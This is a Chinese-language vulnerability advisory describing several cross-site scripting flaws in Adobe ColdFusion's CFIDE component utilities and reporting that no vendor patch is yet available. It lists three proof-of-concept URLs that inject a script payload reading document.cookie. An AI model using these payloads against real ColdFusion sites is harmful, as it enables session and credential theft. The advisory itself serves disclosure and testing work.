Adobe ColdFusion多个跨站脚本执行漏洞

发表评论 (0) 查看评论

受影响系统:

Adobe ColdFusion

描述:

BUGTRAQ  ID: 49787

Adobe ColdFusion是一个动态Web服务器。

Adobe ColdFusion在实现上存在多个跨站脚本执行漏洞,远程攻击者可利用这些漏洞在受影响站点执行任意脚本代码,窃取cookie身份验证凭证。

<*来源:MustLive (mustlive@websecurity.com.ua
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

MustLive (mustlive@websecurity.com.ua)提供了如下测试方法:
http://example.com/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E

http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&amp;name=%3Cbody%20onload=alert(document.cookie)%3E

http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E

建议:

厂商补丁:

Adobe
—–
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.adobe.com

发表评论?

0 条评论。

发表评论